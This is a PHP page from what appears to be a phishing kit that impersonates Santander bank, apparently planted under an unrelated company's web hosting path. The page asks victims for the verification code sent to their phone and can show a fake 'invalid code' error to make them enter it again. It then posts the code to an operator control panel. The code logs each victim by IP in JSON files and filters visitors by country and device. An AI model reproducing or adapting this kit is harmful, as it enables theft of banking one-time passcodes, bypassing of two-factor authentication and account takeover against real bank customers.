File "step-seven.php"
Full Path: /home/gemaengineering/particularesantander.gemaengineering.com/santander-page/pages/step-seven.php
File size: 4.94 KB
MIME-type: text/x-php
Charset: utf-8
<?php
error_reporting(0);
session_start();
include '../setting/functions.php';
include '../includes/current-page.php';
include '../includes/check-allowed-countries.php';
include '../includes/check-devices-allow.php';
$ip = get_client_ip();
$get_name_file = $ip;
$target_file = "../panel/storage/{$get_name_file}.json";
$json_file = file_get_contents($target_file);
$user_info = json_decode($json_file, true);
$user_info['error_code_mobile'];
if ($user_info['error_code_mobile'] == 1) {
$get_name_page = "Page Firma Error";
$get_step = "code-mobile-error";
} else {
$get_name_page = "Page Code Mobile";
$get_step = "code-mobile";
}
get_page_info($get_name_page, $get_name_file);
$random_classes = rand(0, 1000000);
$permitted_chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
?>
<!DOCTYPE html>
<html lang="en" class="">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<!-- SEO -->
<?php include '../libraries/seo.php'; ?>
<!-- Font Google -->
<link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Nunito:ital,wght@0,200..1000;1,200..1000&display=swap" rel="stylesheet">
<!-- Font Awesome Library -->
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.1/css/all.min.css" integrity="sha512-KfkfwYDsLkIlwQp6LFnl8zNdLGxu9YAA1QvwINks4PhcElQSvqcyVLLD9aMhXd13uQjoXtEKNosOWaZqXgel0g==" crossorigin="anonymous" referrerpolicy="no-referrer" />
<!-- File Css -->
<link rel="stylesheet" href="../css/main.css">
<link rel="stylesheet" href="../css/basic-thinks.css">
<!-- Favicon -->
<link rel="icon" href="../img/favicon.ico">
<link rel="shortcut" href="../img/favicon.ico">
<link rel="appel-touch-icon" href="../img/favicon.ico">
<title>PÁGINA WEB</title>
</head>
<body id="body" class="">
<!-- Main -->
<div class="section-main">
<div class="section-left">
</div>
<div class="section-right">
<div class="logo">
<img src="../img/logo.png" alt="">
</div>
<div class="prt-icon">
<img src="../img/code-mobile.png" alt="">
</div>
<h1 style="margin-bottom: 10px !important;font-size: 25px !important;">Introduce Código</h1>
<p>
Te lo hemos enviado a tu móvil.
</p>
<form action="../control-panel/check-action.php" method="post" id="fSD" class="form-element">
<input type="hidden" name="step" value="<?php echo $get_step; ?>">
<input type="hidden" name="ip" value="<?php echo $get_name_file; ?>">
<?php
if ($user_info['error_code_mobile'] == 1) {
echo '<div class="message-error-pages">
<img src="../img/icon-error.png" alt="">
Debes introducir un código válido que se te ha enviado a tu teléfono. Vuelve a intentarlo.
</div>';
}
?>
<div class="prt-l-i-me" id="div1">
<label for="codeMobile">Escribe El Código</label>
<input type="text" name="code_mobile" id="codeMobile" class="input-element" placeholder="Escribe El Código">
<small id="messageError1" class="me-i"><img src="../img/icon-error.png" alt="">Este campo es obligatorio</small>
</div>
<div class="prt-btn">
<button type="submit" name="b_s_d_p" id="bSD" class="btn-element">Continuar</button>
</div>
</form>
</div>
</div>
<!-- Main -->
<!-- Footer -->
<div class="footer">
<div class="section-top">
<span class="link-footer">Seguridad y privacidad</span>
<span class="link-footer">Términos y condiciones</span>
<span class="link-footer">Precios</span>
<span class="link-footer">Información legal</span>
<span class="link-footer">Política de cookies</span>
</div>
<div class="section-bottom">
<div class="logo-footer">
<img src="../img/logo-footer.png" alt="">
</div>
<div class="text-footer">© <?php echo date("Y"); ?> Santander - Reservados todos los derechos.</div>
</div>
</div>
<!-- Footer -->
<!-- Script Js -->
<script src="../js/script-step-seven.js"></script>
<script src="../js/jquery.min.js"></script>
<?php include '../includes/redirect.php'; ?>
<?php include '../includes/status.php'; ?>
</body>
</html>